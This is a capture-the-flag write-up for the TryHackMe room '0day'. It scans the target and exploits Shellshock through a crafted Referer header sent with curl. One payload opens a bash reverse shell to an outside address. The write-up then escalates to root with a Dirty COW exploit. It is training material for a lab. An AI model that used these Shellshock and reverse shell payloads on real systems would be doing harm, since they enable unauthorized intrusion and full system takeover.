Oday-TryHackMe

 

This is the write-up for room named 0day on TryHackMe.

The room can be found here :- https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt

                                                                        Enumeration                                                                         

NMAP:

As always lets start scanning the target with the IP given:

nmap -sC -sV 10.10.119.34 

We have port 22-SSH and port 80-Web open with the above versions. Let enumerate further port 80 using Nikto.

NIKTO:

nikto -h 10.10.119.34

The above nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in bash and according to Wikipedia(https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

Shellshock, also known as Bashdoor,is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. Nikto scan also revealed few interesting web directories like /admin,/backup and /secret. Lets keep that in mind and if required we can come back to these directories later for further enumeration.

We can use cURL and try to enumerate further and test if we are actually vulnerable to Shellshock.

SHELLSHOCK:

curl http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"

This outputs www-data as the user confirming it is exploitable using Shellshock.

                                                                            Exploit                                                                               

SHELLSHOCK:

Lets exploit Shellshock and gets a reverse shell using the following command:

curl -v http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/10.8.98.192/9999 0>&1"

We get our reverse shell and thus our user flag in ryan's home directory :- THM{Sh********_*****}

                                                                    Privilege Escalation                                                                  

DIRTY COW:

Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh which suggest that the box is vulnerable to dirtyc0w vulnerability.

Again this a very famous vulnerability and read more details about it here:- https://dirtycow.ninja/

This can be used to do privilege escalation and a working exploit is available here which worked for this box: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

Target is a x64 machine and we faced problems in compiling the exploit on the target. 

www-data@ubuntu:/tmp cat /proc/version
cat /proc/version
Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So compile the exploit locally on kali and transfer it to the target.

┌──(kali㉿kali)-[/opt/tools/exploits]
└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on target gives us root shell and the root flag in /root :- THM{g00d********************}